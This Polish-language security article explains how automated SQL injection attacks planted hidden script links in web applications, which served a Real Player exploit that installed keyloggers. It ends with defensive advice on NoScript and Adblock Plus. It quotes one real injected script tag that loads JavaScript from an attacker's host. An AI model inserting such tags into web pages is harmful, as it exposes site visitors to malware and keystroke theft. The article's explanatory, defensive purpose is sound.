Oprócz wykorzystywania błędów w przeglądarkach internetowych, crackerzy zainteresowali się ostatnio wtyczkami, które wyświetlają zawartość obiektów umieszczanych na stronach internetowych.

Aplikacje webowe, z założenia łatwo dostępne przez Internet, są narażone na wiele ataków, w tym SQL Injection. Wiele aplikacji było podatnych na to zagrożenie, wystarczy wspomnieć o forach dyskusyjnych pracujących przy wykorzystaniu starej wersji programu PHBB. Luka ta była tak popularna, że powstał gotowy eksploit, który praktycznie mógł być użyty przez każdego początkującego hakera. Warto też wiedzieć, że błąd tego typu bardzo dobrze nadaje się do automatyzacji przy użyciu skryptu, a nawet umożliwia łatwe napisanie robaka internetowego. Błąd SQL Injection w aplikacji webowej może także być nośnikiem linku do złośliwego kodu eksploitującego luki w komputerze klienta.

Oprócz wykorzystywania błędów w samych przeglądarkach internetowych, crackerzy zainteresowali się też wtyczkami, które wyświetlają zawartość obiektów umieszczanych na stronach internetowych. Znane są ataki umożliwiające uruchomienie dowolnego kodu przemyconego wewnątrz plików PDF otwieranych za pomocą Adobe Reader w Internet Explorer 7http://www.adobe.com/support/security/bulletins/apsb07-18.html , a niedawno został ujawniony błąd w aplikacji Real Playerhttp://secunia.com/advisories/28276/ . Na tę ostatnią lukę jeszcze nie ma łaty, zatem ryzyko jest dość duże i dobrze wiedzą o tym komputerowi włamywacze. Warto zauważyć, że dotychczasowe ataki wykorzystujące tę lukę miały wyłącznie charakter komercyjny.

Atak na wtyczki

Aby atak był skuteczny na skalę masową, należy przygotować dobry eksploit (co już nastąpiło) oraz odpowiednio szeroko rozpowszechnić go w sieci. Do tego celu posłużył automat wykorzystujący właśnie SQL Injection, który umieszczał w atakowanych aplikacjach webowych link do obiektu Real Media zawierającego wirusa - szczegóły są tuhttp://isc.sans.org/diary.html?storyid=3823 . Link ten jest postaci <script src=http://n.uc8010.com/0.js></script> i bardzo łatwo można znaleźć wiele zarażonych aplikacji pracujących w środowisku Microsoft IIS/SQL Server. Eksploitowano kilka luk, w tym popularny błąd dotyczący dostępu do danych Microsoft Data Access Component MDAC, do którego poprawka została udostępniona w kwietniu 2006 r., ale wiele serwisów webowych nadal jest na niego podatnych. Wyemitowany skrypt był uruchamiany przez przeglądarki, powodując pobranie niebezpiecznego elementu, który wykorzystuje lukę w bezpieczeństwie programu Real Player i instaluje keylogger, program szpiegowski do detekcji naciskanych przez użytkownika klawiszy i przesyłania informacji o tym do hakera.

Cechą szczególną ataku tego typu jest użycie skompromitowanych aplikacji webowych tylko jako nośnika łącza do właściwego serwera emitującego wirusa. Atak, który celuje w popularne serwisy webowe, może być bardzo skuteczny. Jeśli napastnik wykorzysta lukę w bezpieczeństwie popularnego serwisu, która powoduje wstawienie linku do swojego obiektu, może w ten sposób efektywnie wykorzystać luki w przeglądarkach internetowych bardzo wielu użytkowników. Warto zauważyć, że dołączenie skryptu napisanego w języku JavaScript może być całkowicie niewidoczne dla użytkowników serwisu, chyba że korzystają z przeglądarki Firefox wyposażonej w zwiększający bezpieczeństwo dodatek - NoScript (patrz niżej). Atak może być także niewidoczny dla administratorów serwisu dopóki program antywirusowy, zapora firewall lub system IPS nie podniosą alarmu.

Niepokojący jest fakt szybkiego rozpowszechnienia złośliwego kodu przez umieszczenie linku do niego w wielu popularnych aplikacjach webowych. Atak za pomocą SQL Injection jest szybki, może łatwo objąć wiele serwisów, zaś w pewnych przypadkach może w ogóle pozostać niezauważony. Jeśli luka dotyczy wtyczki, której stan aktualności nie jest monitorowany, wiele stacji roboczych jest wrażliwych na taki atak.

Jak się bronić

Warto skorzystać z bezpieczniejszej niż IE alternatywy - przeglądarki Mozilla Firefox. Co prawda błędy potencjalnie obecne są w wielu programach, zarówno w przeglądarce, jak i we wszystkich wtyczkach do niej (takich jak nieaktualizowany Acrobat Reader lub Flash Player), ale Firefox ma istotną przewagę nad Internet Explorerem - został wyposażony w narzędzia umożliwiające włączanie i wyłączanie obsługi poszczególnych składników web zależnie od domeny, z której pochodzą. Odbywa się to za pomocą odpowiedniego dodatku - NoScript. Jeśli luka bezpieczeństwa dotyczy wtyczki dla środowiska Windows, w większości przypadków eksploit zadziała w Internet Explorerze, Firefoxie i Operze. Zadziała, jeśli przeglądarka dopuści do pobrania złośliwego kodu i dostarczenia go do aplikacji odtwarzającej. Właśnie tę drogę kodu można zablokować za pomocą NoScript i Adblock Plus.

Instalacja NoScript jest bardzo prosta, dodatek działa od razu, domyślnie blokując obsługę JavaScript dla niemal wszystkich stron. Przeglądanie z wyłączoną obsługą JavaScript bywa utrudnione, dlatego w przypadku stron, które wymagają obsługi skryptów, można selektywnie włączyć ich obsługę dla konkretnej strony lub domeny. Przy korzystaniu z NoScript należy przyjąć zasadę włączania tylko tych obiektów, które są niezbędne. Najczęściej dotyczy to skryptów pochodzących z tego samego serwera lub tej samej domeny co strona czy aplikacja webowa.

NoScript umożliwia blokowanie uporczywych animacji Flash, skryptów JavaScript, apletów Java i innych obiektów odtwarzanych przez wtyczki. Jeśli użytkownik chce załadować i obejrzeć animację Flash, wystarczy kliknąć w miejsce oznaczone przez program. Dodatkowo NoScript chroni przed atakami Cross-Site-Scripting, ale w przypadku wielu aplikacji może to powodować problemy w ich pracy, dlatego należy albo wyłączyć ochronę przed XSS, albo dodać wszystkie ich adresy do wyjątków programu.

Drugim pożytecznym dodatkiem jest Adblock Plus, który posiada listę serwerów emitujących reklamy. Ze względu na zalew reklam z tych samych źródeł, filtrowanie ich (przez wyrażenia regularne zawarte w często uaktualnianych listach) może być bardzo skuteczne. Razem z uporczywymi animacjami, odfiltrowane zostaną także fragmenty złośliwego kodu, gdyby ponownie ktoś zdecydował się na ich emisję za pomocą płatnych reklam.